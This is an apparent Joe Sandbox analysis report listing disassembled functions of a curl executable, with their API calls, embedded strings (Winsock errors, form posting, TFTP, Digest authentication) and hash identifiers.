Instruction ID: fc901a386ad3bb16e3e6417582d9d1bde6c3708ebb0d0f243c25d5d61415ea52
Opcode Fuzzy Hash: abc97ff8b00330c42eaec1eab87a35c786fba96b82cc726048d531dba98f1ecc
Instruction Fuzzy Hash: F431AD31F093254BEB58896E889032BB6D3ABD8750F51C63FE99DC3398D9789C058786

Function 0044A444 Relevance: .1, Instructions: 125COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3fbc7e2aa98bc749e0fcb542e110425d2e9ea16d540037b1a8c4e0c514ce4822
Instruction ID: 64bbfb54d2ffa9c2cc215399e52d0d957c14dd73ef67fbbb373e9a9843bdd296
Opcode Fuzzy Hash: 3fbc7e2aa98bc749e0fcb542e110425d2e9ea16d540037b1a8c4e0c514ce4822
Instruction Fuzzy Hash: 2B4116336C07184BFB348E58D9847BF7350AB95304F46092ACEC967741D6BAAC668687

Function 00413810 Relevance: 107.0, APIs: 10, Strings: 51, Instructions: 288stringwindowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00413822
strerror.MSVCRT ref: 00413913
strncpy.MSVCRT ref: 00413927
strrchr.MSVCRT ref: 00413941
strrchr.MSVCRT ref: 00413961
GetLastError.KERNEL32 ref: 00413975
SetLastError.KERNEL32 ref: 00413981
strncpy.MSVCRT ref: 00413AF6
FormatMessageA.KERNEL32 ref: 00413B3C
curl_msnprintf.CURL ref: 00413B68

Strings

Winsock version not supported, xrefs: 00413D10
Bad access, xrefs: 00413CC0
Host unreachable, xrefs: 004139BE
Bad file, xrefs: 00413BA6
Too many references, xrefs: 00413A4C
Call interrupted, xrefs: 00413CF0
Operation not supported, xrefs: 00413E20
Bad message size, xrefs: 00413ADF
Descriptor is not a socket, xrefs: 00413ADA
Socket is already connected, xrefs: 00413B84
Socket is not connected, xrefs: 00413CA0
Winsock library is not ready, xrefs: 00413A88
Connection refused, xrefs: 00413DB0
Loop??, xrefs: 00413C34
Need destination address, xrefs: 00413AD3
Bad quota, xrefs: 00413BEA
Connection was aborted, xrefs: 00413900
Call would block, xrefs: 00413C56
No data record of requested type, xrefs: 004138A4
Address not available, xrefs: 00413C74
Something is stale, xrefs: 00413C84
Remote error, xrefs: 00413D20
Timed out, xrefs: 00413D50
Not empty, xrefs: 004139CE
Network down, xrefs: 00413E00
Unknown error %d (%#x), xrefs: 00413B55
Host not found, try again, xrefs: 00413D60
Socket is unsupported, xrefs: 00413DC0
No buffer space, xrefs: 00413CB0
Disconnected, xrefs: 00413C12
Too many users, xrefs: 00413DF0
Bad protocol, xrefs: 00413D90
Network unreachable, xrefs: 004138FB
Connection was reset, xrefs: 00413D80
Host not found, xrefs: 00413D00
Address family not supported, xrefs: 00413E10
Socket has been shut down, xrefs: 00413CE0
Process limit reached, xrefs: 00413DA0
Unrecoverable error in call to nameserver, xrefs: 00413D70
Bad argument, xrefs: 00413DD0
Winsock library not initialised, xrefs: 00413D30
Blocking call in progress, xrefs: 00413E2A
Address already in use, xrefs: 00413C90
Network has been reset, xrefs: 004138F0
Host down, xrefs: 004139C9
Protocol family not supported, xrefs: 00413AB8
Out of file descriptors, xrefs: 00413CD0
Protocol option is unsupported, xrefs: 00413DE0
Protocol is unsupported, xrefs: 00413BC8
Name too long, xrefs: 00413D40
Invalid arguments, xrefs: 00413A18

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLast$strncpystrrchr$FormatMessagecurl_msnprintfstrerror
String ID: Address already in use$Address family not supported$Address not available$Bad access$Bad argument$Bad file$Bad message size$Bad protocol$Bad quota$Blocking call in progress$Call interrupted$Call would block$Connection refused$Connection was aborted$Connection was reset$Descriptor is not a socket$Disconnected$Host down$Host not found$Host not found, try again$Host unreachable$Invalid arguments$Loop??$Name too long$Need destination address$Network down$Network has been reset$Network unreachable$No buffer space$No data record of requested type$Not empty$Operation not supported$Out of file descriptors$Process limit reached$Protocol family not supported$Protocol is unsupported$Protocol option is unsupported$Remote error$Socket has been shut down$Socket is already connected$Socket is not connected$Socket is unsupported$Something is stale$Timed out$Too many references$Too many users$Unknown error %d (%#x)$Unrecoverable error in call to nameserver$Winsock library is not ready$Winsock library not initialised$Winsock version not supported
API String ID: 2530841112-3727733604
Opcode ID: c20b9d807e2a0385c82387494b4478cd950dbc4bfd95c4bc04fd39244d6c8c72
Instruction ID: 193f160274b05618561133da15e7d56b3b52d983c7bec8b797ec550047ed6542
Opcode Fuzzy Hash: c20b9d807e2a0385c82387494b4478cd950dbc4bfd95c4bc04fd39244d6c8c72
Instruction Fuzzy Hash: 63A18471B0C25487DB246E1C804C6EBAA509B00387F15817FE8DA977A1E76E8FC5978F

Function 00402690 Relevance: 91.9, APIs: 61, Instructions: 366COMMON

Download Yara Rule

APIs

curl_easy_cleanup.CURL(?,00000000,?,00451712), ref: 004026A3
free.MSVCRT(?,00000000,?,00451712), ref: 004026B8
free.MSVCRT(?,00000000,?,00451712), ref: 004026CE
free.MSVCRT(?,00000000,?,00451712), ref: 004026E4
free.MSVCRT(?,00000000,?,00451712), ref: 004026FA
free.MSVCRT(?,00000000,?,00451712), ref: 00402710
free.MSVCRT(?,00000000,?,00451712), ref: 00402726
free.MSVCRT(?,00000000,?,00451712), ref: 0040273C
free.MSVCRT(?,00000000,?,00451712), ref: 00402752
free.MSVCRT(?,00000000,?,00451712), ref: 0040276B
free.MSVCRT(?,00000000,?,00451712), ref: 00402787
free.MSVCRT(?,00000000,?,00451712), ref: 004027A3
free.MSVCRT(?,00000000,?,00451712), ref: 004027BF
free.MSVCRT(?,00000000,?,00451712), ref: 004027DB
free.MSVCRT(?,00000000,?,00451712), ref: 004027F7
free.MSVCRT(?,00000000,?,00451712), ref: 00402813
free.MSVCRT(?,00000000,?,00451712), ref: 0040282F
free.MSVCRT(?,00000000,?,00451712), ref: 0040284B
free.MSVCRT(?,00000000,?,00451712), ref: 00402867
free.MSVCRT(?,00000000,?,00451712), ref: 00402883
free.MSVCRT(?,00000000,?,00451712), ref: 0040289F
free.MSVCRT(?,00000000,?,00451712), ref: 004028BB
free.MSVCRT(?,00000000,?,00451712), ref: 004028D7
free.MSVCRT(?,00000000,?,00451712), ref: 004028F3
free.MSVCRT(?,00000000,?,00451712), ref: 0040290F
curl_slist_free_all.CURL(?,00000000,?,00451712), ref: 00402927
free.MSVCRT(?,00000000,?,00451712), ref: 00402939
free.MSVCRT(?,00000000,?,00451712), ref: 00402955
free.MSVCRT(?,00000000,?,00451712), ref: 0040297E
free.MSVCRT(?,00000000,?,00451712), ref: 00402994
free.MSVCRT(?,00000000,?,00451712), ref: 004029AA
free.MSVCRT(?,00000000,?,00451712), ref: 004029B9
free.MSVCRT(?,00000000,?,00451712), ref: 004029F7
free.MSVCRT(?,00000000,?,00451712), ref: 00402A13
free.MSVCRT(?,00000000,?,00451712), ref: 00402A2F
free.MSVCRT(?,00000000,?,00451712), ref: 00402A4B
free.MSVCRT(?,00000000,?,00451712), ref: 00402A67
free.MSVCRT(?,00000000,?,00451712), ref: 00402A83
free.MSVCRT(?,00000000,?,00451712), ref: 00402A9F
free.MSVCRT(?,00000000,?,00451712), ref: 00402ABB
free.MSVCRT(?,00000000,?,00451712), ref: 00402AD7
free.MSVCRT(?,00000000,?,00451712), ref: 00402AF3
free.MSVCRT(?,00000000,?,00451712), ref: 00402B0F
free.MSVCRT(?,00000000,?,00451712), ref: 00402B2B
free.MSVCRT(?,00000000,?,00451712), ref: 00402B47
free.MSVCRT(?,00000000,?,00451712), ref: 00402B63
free.MSVCRT(?,00000000,?,00451712), ref: 00402B7F
free.MSVCRT(?,00000000,?,00451712), ref: 00402B9B
free.MSVCRT(?,00000000,?,00451712), ref: 00402BC1
curl_slist_free_all.CURL(?,00000000,?,00451712), ref: 00402BE3
curl_slist_free_all.CURL(?,00000000,?,00451712), ref: 00402BF1
curl_slist_free_all.CURL(?,00000000,?,00451712), ref: 00402BFF
curl_slist_free_all.CURL(?,00000000,?,00451712), ref: 00402C0D
curl_formfree.CURL(?,00000000,?,00451712), ref: 00402C1F
curl_slist_free_all.CURL(?,00000000,?,00451712), ref: 00402C41
curl_slist_free_all.CURL(?,00000000,?,00451712), ref: 00402C4F
free.MSVCRT(?,00000000,?,00451712), ref: 00402C61
free.MSVCRT(?,00000000,?,00451712), ref: 00402C7D
free.MSVCRT(?,00000000,?,00451712), ref: 00402C99
free.MSVCRT(?,00000000,?,00451712), ref: 00402CB5
free.MSVCRT(?,00000000,?,00451712), ref: 00402CD1

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: free$curl_slist_free_all$curl_easy_cleanupcurl_formfree
String ID:
API String ID: 1225796149-0
Opcode ID: 09383250c687edd5a0b1eaa086d8db227fbba560d02fede3304068297ae89c03
Instruction ID: d8269559cad62d7355a13f5ca01bc584a358798bd15572d1e970b74330663d22
Opcode Fuzzy Hash: 09383250c687edd5a0b1eaa086d8db227fbba560d02fede3304068297ae89c03
Instruction Fuzzy Hash: 3AF1B3B06046428BEB10AF76C5D8B9A77E4AF01344F08487DDC98AF396EB79D484CB65

Function 004038F0 Relevance: 65.2, APIs: 21, Strings: 16, Instructions: 436stringCOMMON

Download Yara Rule

APIs

sscanf.MSVCRT ref: 00403917
strchr.MSVCRT ref: 00403932
_strdup.MSVCRT ref: 00403945
strstr.MSVCRT ref: 0040397A
curl_formadd.CURL ref: 00403A1E
free.MSVCRT ref: 00403A4E
curl_formadd.CURL ref: 00403AEE
free.MSVCRT ref: 00403B00
isspace.MSVCRT ref: 00403BD9
sscanf.MSVCRT ref: 00403C24
malloc.MSVCRT ref: 00403D19
curl_formadd.CURL ref: 00403D9F
free.MSVCRT ref: 00403DAF
curl_mfprintf.CURL ref: 00403FB8

Strings

Illegally formatted input field!, xrefs: 00403A61
type=, xrefs: 00403BEB
%127[^/]/%127[^;,], xrefs: 00403C0B
@, xrefs: 00403957
=, xrefs: 00403927
curl_formadd failed!, xrefs: 00403DCC, 00403FC9
filename=, xrefs: 00403DFC
curl_formadd failed, possibly the file %s is bad!, xrefs: 00403A3B
Illegally formatted content-type field!, xrefs: 00403ECF
skip unknown form field: %s, xrefs: 00403E79
out of memory, xrefs: 00403FA7
;filename=, xrefs: 00403E9E
Error building form post!, xrefs: 00403F6C, 00403FFF
;type=, xrefs: 0040396F
%255[^=]=, xrefs: 0040390C
<, xrefs: 004039C5

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_formaddfree$sscanf$_strdupcurl_mfprintfisspacemallocstrchrstrstr
String ID: %127[^/]/%127[^;,]$%255[^=]=$;filename=$;type=$<$=$@$Error building form post!$Illegally formatted content-type field!$Illegally formatted input field!$curl_formadd failed!$curl_formadd failed, possibly the file %s is bad!$filename=$out of memory$skip unknown form field: %s$type=
API String ID: 1072120443-545617825
Opcode ID: 746b13373e5f3696ba35cdc671b1d1cf3414151f8bd8c6176fa548421c14abeb
Instruction ID: df911fce36e66e56bee357a53e1c249d2e8489f09562da6aa94dbc328b7cda2f
Opcode Fuzzy Hash: 746b13373e5f3696ba35cdc671b1d1cf3414151f8bd8c6176fa548421c14abeb
Instruction Fuzzy Hash: 791238B06083448FD710DF25C48475ABBF4FF85349F14892EE9C89B391E779EA898B46

Function 00434760 Relevance: 56.4, APIs: 12, Strings: 20, Instructions: 406stringnetworkCOMMON

Download Yara Rule

APIs

time.MSVCRT ref: 00434780
recvfrom.WS2_32 ref: 0043484A
memchr.MSVCRT ref: 00434903
memchr.MSVCRT ref: 0043493D
strlen.MSVCRT ref: 004349A8
strtol.MSVCRT ref: 004349DC
strlen.MSVCRT ref: 00434B23
strtol.MSVCRT ref: 00434B57
strlen.MSVCRT ref: 0043496E

Part of subcall function 00416640: curl_mvsnprintf.CURL ref: 00416682
Part of subcall function 00416640: strlen.MSVCRT ref: 0041668A

time.MSVCRT ref: 00434A58
WSAGetLastError.WS2_32 ref: 00434C80
memcpy.MSVCRT ref: 00434CEF

Strings

%s (%ld), xrefs: 00434B64
%s (%d), xrefs: 00434DFA, 00434E22
Internal error: Unexpected packet, xrefs: 00434D74
requested, xrefs: 00434A2B
got option=(%s) value=(%s), xrefs: 00434995
%s (%d) %s (%d), xrefs: 00434A3B
blksize is larger than max supported, xrefs: 00434E1A
blksize, xrefs: 004349AD
Malformed ACK packet, rejecting, xrefs: 00434DA6
invalid tsize -:%s:- value in OACK packet, xrefs: 00434E6A
Received too short packet, xrefs: 00434D11
server requested blksize larger than allocated, xrefs: 00434DCA
blksize parsed from OACK, xrefs: 00434A33
tsize, xrefs: 00434B28
tsize parsed from OACK, xrefs: 00434B5C
%s, xrefs: 00434D59
invalid blocksize value in OACK packet, xrefs: 00434E3A
%s (%ld), xrefs: 00434DD2
blksize is smaller than min supported, xrefs: 00434DF2
TFTP response timeout, xrefs: 00434AB9

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: strlen$memchrstrtoltime$ErrorLastcurl_mvsnprintfmemcpyrecvfrom
String ID: %s$%s (%d)$%s (%d) %s (%d)$%s (%ld)$%s (%ld)$Internal error: Unexpected packet$Malformed ACK packet, rejecting$Received too short packet$TFTP response timeout$blksize$blksize is larger than max supported$blksize is smaller than min supported$blksize parsed from OACK$got option=(%s) value=(%s)$invalid blocksize value in OACK packet$invalid tsize -:%s:- value in OACK packet$requested$server requested blksize larger than allocated$tsize$tsize parsed from OACK
API String ID: 103226700-179111806
Opcode ID: 8a3942df9006bbe43962cfe242f22efb79ec3c034ed7870f91ddc0753738d196
Instruction ID: 5256891e0e85f6ce20e58974a38eac18ec9a55c47fb4224476b79dce4b1fd339
Opcode Fuzzy Hash: 8a3942df9006bbe43962cfe242f22efb79ec3c034ed7870f91ddc0753738d196
Instruction Fuzzy Hash: 3E1227B0A087119FCB10EF29C58479ABBF1AF89314F11C95EE89897351D738E985CF86

Function 004041F7 Relevance: 54.6, APIs: 28, Strings: 3, Instructions: 392stringCOMMON

Download Yara Rule

APIs

_strdup.MSVCRT ref: 0040422B
malloc.MSVCRT ref: 00404294
memcpy.MSVCRT ref: 004042B5
memcpy.MSVCRT ref: 004042DB
free.MSVCRT ref: 004042F0
free.MSVCRT ref: 00404300
strchr.MSVCRT ref: 00405202
_strdup.MSVCRT ref: 00405233
curl_easy_escape.CURL ref: 00405292
free.MSVCRT ref: 004052A4
strlen.MSVCRT ref: 004052BC
malloc.MSVCRT ref: 004052DB
curl_msnprintf.CURL ref: 00405324
curl_free.CURL ref: 00405337
curl_strequal.CURL ref: 00406070
strlen.MSVCRT ref: 004060AA
fclose.MSVCRT ref: 004060C2

Strings

@, xrefs: 00406457
Couldn't read data from file "%s", this makes an empty POST., xrefs: 00406558, 00406F43
%.*s=%s, xrefs: 00405309

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: free$_strdupmallocmemcpystrlen$curl_easy_escapecurl_freecurl_msnprintfcurl_strequalfclosestrchr
String ID: %.*s=%s$@$Couldn't read data from file "%s", this makes an empty POST.
API String ID: 4156856463-2064574832
Opcode ID: 5f53476c447852d6c48c3ea54cd8d4d7010b250d88c62efa9d16bf979912139d
Instruction ID: cd51ac0739de8bd8b43c7dea4d6c164eb9b7ce3a73970a1ddea5fb2978e9e9d3
Opcode Fuzzy Hash: 5f53476c447852d6c48c3ea54cd8d4d7010b250d88c62efa9d16bf979912139d
Instruction Fuzzy Hash: 0EF138B06087419FC710DF29C48466FBBE5AFC5348F05892EE9C9AB391E778D845CB4A

Function 004015F0 Relevance: 54.6, APIs: 17, Strings: 14, Instructions: 312fileCOMMON

Download Yara Rule

APIs

curl_strequal.CURL ref: 00401655

Part of subcall function 0040EF20: _stricmp.MSVCRT ref: 0040EF32

localtime.MSVCRT ref: 004016C6
curl_msnprintf.CURL ref: 004016FA
curl_mfprintf.CURL ref: 00401759
curl_mfprintf.CURL ref: 00401797
curl_mfprintf.CURL ref: 00401831
fputc.MSVCRT ref: 0040186F
fwrite.MSVCRT ref: 00401967
curl_mfprintf.CURL ref: 004019A6
fwrite.MSVCRT ref: 004019CA
curl_mfprintf.CURL ref: 00401A4D
curl_mfprintf.CURL ref: 00401A61
curl_strequal.CURL ref: 00401C1B

Strings

-%w, xrefs: 0040164A
., xrefs: 0040181E
%04zx: , xrefs: 00401788
=> Send SSL data, xrefs: 004018AA
=> Send header, xrefs: 004018EC
%02d:%02d:%02d.%06ld , xrefs: 004016DF
%s%s, %zd bytes (0x%zx), xrefs: 00401746
[data not shown], xrefs: 00401A56
=> Send data, xrefs: 00401717
<= Recv data, xrefs: 004018F6
%s%s , xrefs: 0040198B, 00401A32
<= Recv SSL data, xrefs: 004018A0
%s== Info: %s, xrefs: 004018B8
<= Recv header, xrefs: 004018E2

Memory Dump Source

Source File: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_mfprintf$curl_strequalfwrite$_stricmpcurl_msnprintffputclocaltime
String ID: %02d:%02d:%02d.%06ld $%04zx: $%s%s $%s%s, %zd bytes (0x%zx)$%s== Info: %s$-%w$.$<= Recv SSL data$<= Recv data$<= Recv header$=> Send SSL data$=> Send data$=> Send header$[data not shown]
API String ID: 175852374-2619256578
Opcode ID: 03e9c03088dee181a6c421e80f8ee31448e70cfc1093acdb329a3f363b6bff00
Instruction ID: b13054be112c8a64f05825ce00a3be65568bbc67f9e5d28f423ec48a94f19116
Opcode Fuzzy Hash: 03e9c03088dee181a6c421e80f8ee31448e70cfc1093acdb329a3f363b6bff00
Instruction Fuzzy Hash: 1CD15F74A08741DFD710DF69D58065ABBE0BB88308F10893FE9989B361E779D984CF4A

Function 0043DA20 Relevance: 51.2, APIs: 15, Strings: 14, Instructions: 408stringCOMMON

Download Yara Rule

APIs

curl_maprintf.CURL ref: 0043DAE5
strchr.MSVCRT ref: 0043DB3F
curl_maprintf.CURL ref: 0043DCBE
curl_maprintf.CURL ref: 0043DD4C

Strings

%s, algorithm="%s", xrefs: 0043DEF1
Proxy-, xrefs: 0043DE1E, 0043E01C
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", cnonce="%s", nc=%08x, qop=%s, response="%s", xrefs: 0043DE60
!, xrefs: 0043DC13
%s:%s:%08x:%s:%s:%s, xrefs: 0043DD39
%s:%s, xrefs: 0043DF7C
%s:%.*s, xrefs: 0043DCA0
auth-int, xrefs: 0043DCCC
%s, opaque="%s", xrefs: 0043DEBF
%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", response="%s", xrefs: 0043E052
%s:%s:%s, xrefs: 0043DADA, 0043DB69, 0043DFBD
d41d8cd98f00b204e9800998ecf8427e, xrefs: 0043DF70
%08x%08x%08x%08x, xrefs: 0043DC0B
auth, xrefs: 0043DE7E

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_maprintf$strchr
String ID: !$%08x%08x%08x%08x$%s, algorithm="%s"$%s, opaque="%s"$%s:%.*s$%s:%s$%s:%s:%08x:%s:%s:%s$%s:%s:%s$%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", cnonce="%s", nc=%08x, qop=%s, response="%s"$%sAuthorization: Digest username="%s", realm="%s", nonce="%s", uri="%.*s", response="%s"$Proxy-$auth$auth-int$d41d8cd98f00b204e9800998ecf8427e
API String ID: 88813798-4280421121
Opcode ID: 2b0508691b14d3e8e389ab347876ebd5c3626849c0abf6d88c9aba46118345f0
Instruction ID: 3c48ae681758f7789fd4d2eec2d1d3400219b9157a133996cdf617cf126183d6
Opcode Fuzzy Hash: 2b0508691b14d3e8e389ab347876ebd5c3626849c0abf6d88c9aba46118345f0
Instruction Fuzzy Hash: 9802F4B4A083458FC720DF2AD48066BBBE0BF98744F05982EE9D987351E778E945CF46

Function 0040EA40 Relevance: 51.0, APIs: 22, Strings: 7, Instructions: 280stringCOMMON

Download Yara Rule

APIs

fputc.MSVCRT ref: 0040EA8D
fputc.MSVCRT ref: 0040EA9D
fputc.MSVCRT ref: 0040EABB
strchr.MSVCRT ref: 0040EAE1
curl_strequal.CURL ref: 0040EB1F
curl_easy_getinfo.CURL ref: 0040EB57
fputs.MSVCRT ref: 0040EB6F
fputc.MSVCRT ref: 0040EB9E
fputc.MSVCRT ref: 0040EBB3
curl_mfprintf.CURL ref: 0040EBEF

Strings

%.3f, xrefs: 0040EC8C
), xrefs: 0040EEF9
url_effective, xrefs: 0040EAFF
%03ld, xrefs: 0040EDA3
%ld, xrefs: 0040EC40
%.0f, xrefs: 0040ED2A
curl: unknown --write-out variable: '%s', xrefs: 0040EBE1

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: fputc$curl_easy_getinfocurl_mfprintfcurl_strequalfputsstrchr
String ID: %.0f$%.3f$%03ld$%ld$)$curl: unknown --write-out variable: '%s'$url_effective
API String ID: 2185251442-1916839478
Opcode ID: 622d24819474ecf2b6aaeea90886bc373104484d04cba96a0f23b939ac3a8014
Instruction ID: b908c7bfe68aa6689c54efbc45a0d769fd231aa5e2914bb3b980afac0762c87d
